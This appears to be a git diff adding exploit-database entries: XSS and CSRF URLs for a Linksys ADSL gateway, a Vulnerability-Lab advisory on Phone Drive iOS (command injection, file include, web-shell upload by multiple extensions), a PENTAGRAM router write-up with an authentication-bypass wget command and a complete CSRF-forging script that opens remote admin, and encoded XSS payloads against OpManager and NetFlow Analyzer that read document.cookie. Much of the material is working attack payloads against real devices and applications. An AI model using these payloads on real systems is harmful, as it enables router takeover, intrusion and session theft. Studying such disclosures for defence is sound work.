+source: http://www.securityfocus.com/bid/24682/info
+
+Linksys Wireless-G ADSL Gateway is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue by enticing victims into opening a malicious URI.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials, cause denial-of-service conditions, and launch other attacks.
+
+Successful exploits will allow script code to be stored persistently in the affected device.
+
+Linksys Wireless-G ADSL Gateway WAG54GS running firmware V1.00.06 is reported vulnerable. 
+
+http://admin:admin@192.168.1.1/setup.cgi?user_list=1&sysname=admin& sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http _wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_e nable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged= yes&h_remote_management=enable&c4_trap_ip_=">
\ No newline at end of file
diff --git a/platforms/hardware/webapps/30245.txt b/platforms/hardware/webapps/30245.txt
new file mode 100755
index 000000000..98baa0938
--- /dev/null
+++ b/platforms/hardware/webapps/30245.txt
@@ -0,0 +1,311 @@
+Document Title:
+===============
+Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1168
+
+
+Release Date:
+=============
+2013-12-11
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1168
+
+
+Common Vulnerability Scoring System:
+====================================
+7.6
+
+
+Product & Service Introduction:
+===============================
+Phone Drive allows you to store, view and manage files on your iPhone or iPad. You can connect to Phone Drive from any Mac or 
+PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. Phone Drive 
+features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most 
+of the file operations: like delete, move, copy, email, share, zip, unzip and more.
+
+(Copy of the Homepage: https://itunes.apple.com/de/app/phone-drive/id431033044 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Eigthythree Phone Drive v4.1.1 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2013-12-11:    Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Eightythree Technologies
+Product: Phone Drive - Mobile Application 4.1.1
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local command/path injection web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
+The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.
+
+The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are 
+able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector 
+in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high 
+with a cvss (common vulnerability scoring system) count of 7.0(+)|(-)7.1.
+
+Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access 
+and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific 
+commands or unauthorized path requests.
+
+Request Method(s):
+				[+] [GET]
+
+Vulnerable Parameter(s):
+				[+] devicename
+
+Affected Module(s):
+				[+] Index File Dir List - [Header]
+
+
+1.2
+A local file/path include web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
+The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the web-application.
+
+The remote file include web vulnerability is located in the vulnerable filename value of the file dir list index module (web interface). 
+Remote attackers can manipulate the filename value in the POST method request of the file upload form to cpmpromise the mobile application.
+Remote attackers are able to include own local files by usage of the file upload module. The attack vector is persistent and the request 
+method is POST. The file include execute occcurs in the main file dir index list. The security risk of the local file include web 
+vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
+
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. 
+Successful exploitation of the local web vulnerability results in application or device compromise by unauthorized local file include attacks.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] File Upload
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:80)
+
+
+
+1.3
+An arbitrary file upload web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
+The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
+
+The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with 
+multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension 
+`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file 
+extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is 
+estimated as high with a cvss (common vulnerability scoring system) count of 6.6(+).
+
+Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
+Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] File Upload
+
+Vulnerable Parameter(s):
+				[+] filename (multiple extensions)
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:80)
+
+
+1.4
+A persistent input validation web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
+The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
+
+The persistent input validation vulnerability is located in the foldername (path) value of the folder/path create web-application module.
+Remote attackers can inject own malicious script codes as payload to the create folder (path) input field. After the client-side inject 
+in the POSt method request the payload will be saved and the vector turns into a persistent attack. The persistent execute occurs in the 
+file dir index- or sub category folder list (http://localhost:8080). Attacker can also inject the script code by the rename of an 
+exsisting issue. The second execute occurs in the delete notification popup box of the item index list. The security risk of the persistent 
+input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.9(+).
+
+Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium 
+user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account 
+steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Input(s):
+				[+] Create Folder
+
+Vulnerable Parameter(s):
+				[+] foldername (path)
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:80)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local command inject web vulnerability can be exploited by local attackers with physical restricted device access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
+
+PoC: DeviceName - Index File Dir List
+
+<tr>
+<td><a href="http://localhost:80/"><img src="Phone%20Drive%20-%20devicename_files/webicon.png" id="headerImg" height="57" width="57"></a></td>
+<td><h2>device bkm>"<<>"<../[LOCAL COMMAND/PATH INJECT WEB VULNERABILITY!]"></h2></td>
+<td width="170" align="center"><a 
+href="http://www.eightythreetech.com" target="_blank"><img 
+src="/webroot/moreapps.png"/></a></td>
+</tr>
+</table>
+
+
+
+1.2
+The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account and user interaction.
+For security demonstration or to reproduce the web vulnerability follow the provided information and steps below.
+
+PoC: 
+<tr class="c"><td class="e"><input name="selection" value="[LOCAL FILE INCLUDE VULNERABILITY!]" type="checkbox"></td>
+<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" height="20" 
+width="20"></a></td><td class="n"><a href="[LOCAL FILE INCLUDE VULNERABILITY!]">[LOCAL FILE INCLUDE VULNERABILITY!]</a></td><td class="m">
+17.09.2015 18:07</td><td class="s">24.7 KB</td><td class="k">Safari Web Archive</td><td class="e">
+<a href="#" title="Download file" onclick="downloadFile("[LOCAL FILE INCLUDE VULNERABILITY!]");">
+<img src="/webroot/webdownload.png" height="15" width="15"></a></td><td class="e"><a href="#" 
+title="Rename file" onclick="modalPopup("Help.webarchive", 0, 1);">
+<img src="/webroot/webrename.png" height="15" width="15"></a></td><td class="e">
+<a href="#" title="Delete file" onclick="modalPopup("Help.webarchive", 2, 1);">
+<img src="/webroot/webdelete.png" height="15" width="15"></a></td></tr>
+
+
+
+1.3
+The arbitrary file upload and restricted upload bypass web vulnerability can be exploited by remote attackers without user interaction 
+or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information 
+and steps below.
+
+
+PoC Session Logs: qqfile
+
+Status: 200 OK
+POST http://localhost:80/qqfile=arbitrary-file-upload.png.txt.iso.js.html.php.jpg 
+Load Flags[LOAD_BYPASS_CACHE  ] 
+Content Size[unknown] Mime Type[unknown]
+   
+Request Headers:
+Host[192.168.2.106]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+X-Requested-With[XMLHttpRequest]
+X-File-Name[arbitrary-file-upload.png.txt.iso.js.html.php.jpg]
+Content-Type[application/octet-stream]
+Referer[http://192.168.2.106/]
+Content-Length[98139]
+Post Data:
+POST_DATA[‰PNG
+
+
+
+1.4
+The persistent input validation web vulnerability can be exploited by remote attackers without privileged web application user account 
+and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
+
+
+PoC: Creat Folder - Index File Dir List & Sub Category List
+
+<tr class="c"><td class="e"><input name="selection" 
+value="%3E%22%3Cx%20src=a%3E" type="checkbox"></td><td class="i">
+<a href="http://localhost/%3E%22%3Ciframe%20src=a%3E/"><img src="Phone%20Drive%20-%20pathname_files/folder.png" 
+height="20" width="20"></a></td><td class="n"><a href="http://localhost/%3E%22%3Cx%3E/">
+>"<[PERSISTENT INJECTED SCRIPT CODE!]"></a></td><td
+class="m">11.12.2013 13:29</td><td
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The first vulnerability can be patched by a secure encode of the devicename value in the ehader section of the index module.
+
+1.2 - 1.3
+Restrict the filename input and parse the context with a filter mechanism. Disallow multiple file extensions and implement 
+a own exception-handling to prevent arbitrary file uploads or restricted file uploads.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local command inject web vulnerability is estimated as high(-).
+
+1.2 - 1.3
+The security risk of the local file include web vulnerability via file and folder name value is estimated as high(+).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/hardware/webapps/30248.txt b/platforms/hardware/webapps/30248.txt
new file mode 100755
index 000000000..0af525213
--- /dev/null
+++ b/platforms/hardware/webapps/30248.txt
@@ -0,0 +1,193 @@
+PENTAGRAM Cerberus P 6363 DSL Router Multiple Vulnerabilities
+Found by condis
+
+Vendor Site / Model: http://www.pentagram.pl/produkty/cerberus-p-6363
+Firmware version: V5.07.28_PEN01 
+Software version: V3.0
+
+
+1. Prolog
+
+Cerberus P 6363 is simple SOHO class router. Its producer claims that it may act
+as a 4 port switch and has an advanced firewall (...)
+
+Device management is only possible through WWW GUI and because of that, GUI was 
+targeted and is subject of this raport.
+
+
+2. Authentication Bypass (CWE-592)
+
+This bug is really trivial. All we need to do is set up "special" cookie before 
+accessing GUI:
+
+condis@pandorum:~$ wget http://192.168.1.100/cgi-bin/DownloadCfg/RouterCfm.cfg -t 1 -nv -O pento.cfg
+2013-12-11 23:06:46 URL:http://192.168.1.100/login.asp [3663] -> "pento.cfg" [1]
+condis@pandorum:~$ head -n 5 pento.cfg 
+<html>
+<head>
+<META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
+<title>PENTAGRAM Cerberus P 6363</title>
+<script type="text/javascript" src="lang/b28n.js"></script>
+
+and now lets try some voodoo magic :x 
+
+condis@pandorum:~$ wget http://192.168.1.100/cgi-bin/DownloadCfg/RouterCfm.cfg -t 1 -nv -O pento.cfg --header="Cookie: admin:language=en"
+condis@pandorum:~$ head -n 5 pento.cfg 
+#Please don't change this file by hand
+dhcp_static_lease3=
+sb/1/ofdm2gpo=0x66442200
+wl_radius_port=1812
+wl0.1_radius_port=1812
+
+
+3. Multiple Cross Site Scripting (CWE-79)
+
+GUI has some simple function that filters out non-alphanumeric characters but it 
+is written in JavaScript, and as we all know, implementing protection only on 
+client-side is no protection at all.
+
+One of attack methods would be to turn off JavaScript or write some simple scripts 
+(i.e.: using curl, wget, etc) that won't interpret JS code like web browser does.
+
+Second method (which is preferred by me) is to make configuration backup; modify 
+it manually changing relevant variables/directives and then reupload it back to 
+the device.
+
+
+3.1 Setting WI-FI Password 
+
+wl_wpa_psk=wifi_password";alert('XSS');//
+
+This code will be executed on index page.
+
+
+3.2 Setting URL Filtration
+
+filter_url0=192.168.1.12-192.168.1.13:bar,0-6,0-0,on,foo");alert('XSS');//
+
+If "filter_url_mode" is disabled, we must change it to "deny" or "pass". Code 
+injected here will be executed in Security Settings -> URL Filter Setting page.
+
+
+3.3 Setting MAC Address Filtration
+
+filter_mac0=DE:AD:DE:AD:DE:AD,0-6,0-0,on,gangbang');alert('xss');//
+
+If "filter_mac_mode" variable is disabled, we must change it to "deny" or "pass". 
+Code injected here will be executed in Security Settings -> MAC Address Filter 
+Settings.
+
+Probably there are more XSS flaws, but I stopped searching after those three...
+
+
+4. Cross Site Request Forgery (CWE-352)
+
+There is no mechanism preventing CSRF attacks by which it is possible to enforce
+any operation on the logged administrator. Below there is simple proof of concept
+which enables httpd to WAN (access from IP = 69.69.69.69) :
+
+
+----- cerber_csrf_poc.html -----------------------------------------------------
+
+<body><script>
+
+/**
+ *
+ * Cross Site Request Forger v1.1
+ * by condis
+ *
+ * Simple utility which aim is to help in 
+ * testing and exploiting CSRF flaws.
+ *
+ * If You don't know how to use it, then
+ * do NOT use it :)
+ *
+ */
+ 
+var CSRForger = function()
+{
+	var f = document.createElement('form');
+ 
+	var obj = {
+ 
+		'target' : '',
+		'method' : 'post',
+		'debug'  : false,
+ 
+		'addInput' : function(name, value) 
+		{
+			var i = document.createElement('input');
+ 
+			i.name  = name;
+			i.value = value;
+			i.type  = name == 'submit' ? 'submit' : (this.debug === 2) ? 'text' : 'hidden';
+ 
+			f.appendChild(i);
+		},
+ 
+ 
+		'addInputs' : function(post) 
+		{
+			for (var field in post) 
+				this.addInput(field, post[field]);
+		},
+ 
+ 
+		'csrForge' : function() 
+		{
+			f.method = (this.method == 'post') ? 'POST' : 'GET';
+			f.action = this.target;
+			f.target = "gangbang";
+ 
+			var i = document.createElement('iframe');
+ 
+			i.style.width  = '100%';
+			i.style.height = '500px';
+ 
+			if(this.debug === 0 || this.debug === false) 
+			{
+				f.style.display = 'none';
+				i.style.display = 'none';
+			}
+ 
+			i.name = f.target;
+			i.src  = f.action;
+ 
+			document.body.appendChild(f);
+			document.body.appendChild(i);
+ 
+			document.getElementsByName('submit').item(0).click();
+		} 
+	};
+ 
+	return obj;
+};
+
+var cerb = new CSRForger();
+
+cerb.target = 'http://192.168.1.100/goform/SafeWanWebMan';
+cerb.method = 'GET';
+
+cerb.addInputs({
+	'GO' 		: 'system_remote.asp',
+	'RMEN' 		: '1',
+	'port'		: '8080',
+	'IP' 		: '69.69.69.69', 
+	'submit'	: 'go go power rangers'
+});
+
+cerb.csrForge();
+</script></body>
+
+----- cerber_csrf_poc.html -----------------------------------------------------
+
+
+5. Epilogue
+
+I tried to estalish a dialogue with vendor (07.12.2013) but they didn't respond 
+for five days (probably they don't give a fuck about security) so I decided to 
+publish all bugs.
+
+Also, what's obvious there is no patch so best solution that I can think of now
+is to stop using P 6363 and try other version. (P 6362 has different firmware
+and at first glance it looked better).
diff --git a/platforms/java/webapps/30271.txt b/platforms/java/webapps/30271.txt
new file mode 100755
index 000000000..6648d244e
--- /dev/null
+++ b/platforms/java/webapps/30271.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24767/info
+
+OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73% 74%6D%6F%6E%2E%62%6C%F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%2 1%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%7 9%3E 
\ No newline at end of file
diff --git a/platforms/java/webapps/30272.txt b/platforms/java/webapps/30272.txt
new file mode 100755
index 000000000..0289fb636
--- /dev/null
+++ b/platforms/java/webapps/30272.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24767/info
+ 
+OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E 
\ No newline at end of file
diff --git a/platforms/java/webapps/30273.txt b/platforms/java/webapps/30273.txt
new file mode 100755
index 000000000..30ccf0293
--- /dev/null
+++ b/platforms/java/webapps/30273.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24767/info
+  
+OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/reports/ReportViewAction.do?selected Tab=Reports&selectedNode=Server_Memory_Utilization&reportN ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E %3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F% 6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6 D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20 %21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F% 57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6 1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69 %65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di splayName=webclient.reports.servers.memutil
\ No newline at end of file
diff --git a/platforms/java/webapps/30274.txt b/platforms/java/webapps/30274.txt
new file mode 100755
index 000000000..fe2302a90
--- /dev/null
+++ b/platforms/java/webapps/30274.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24767/info
+   
+OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/admin/ServiceConfiguration.do?operati on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7 0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F% 73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E %4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2 1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20% 21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72 %74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2 F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte r&serviceName=Alerter
\ No newline at end of file
diff --git a/platforms/java/webapps/30275.txt b/platforms/java/webapps/30275.txt
new file mode 100755
index 000000000..712550978
--- /dev/null
+++ b/platforms/java/webapps/30275.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24767/info
+    
+OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/admin/DeviceAssociation.do?selectedNo de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D %6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3 E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7 0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa me=com.adventnet.me.opmanager.webclient.admin.association.N TServiceAssociation
\ No newline at end of file
diff --git a/platforms/java/webapps/30276.txt b/platforms/java/webapps/30276.txt
new file mode 100755
index 000000000..ae218c99e
--- /dev/null
+++ b/platforms/java/webapps/30276.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24767/info
+     
+OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E 
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30266.txt b/platforms/jsp/webapps/30266.txt
new file mode 100755
index 000000000..af51f7229
--- /dev/null
+++ b/platforms/jsp/webapps/30266.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24766/info
+
+NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects NetFlow Analyzer 5; other versions may also be affected.
+
+http://www.example.com/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E 
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30267.txt b/platforms/jsp/webapps/30267.txt
new file mode 100755
index 000000000..70c205b33
--- /dev/null
+++ b/platforms/jsp/webapps/30267.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24766/info
+ 
+NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+This issue affects NetFlow Analyzer 5; other versions may also be affected.
+
+http://www.example.com/netflow/jspui/appConfig.jsp?task=Modif y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7 2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6 2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6 E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3 E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6 5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3 C%2F%62%6F%64%79%3E&appID=62
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30268.txt b/platforms/jsp/webapps/30268.txt
new file mode 100755
index 000000000..0fba4bfe6
--- /dev/null
+++ b/platforms/jsp/webapps/30268.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/24766/info
+  
+NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+This issue affects NetFlow Analyzer 5; other versions may also be affected.
+
+ http://www.example.com/netflow/jspui/index.jsp?grID=-1&view= ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F% 6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74% 6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31% 3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70% 74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos 
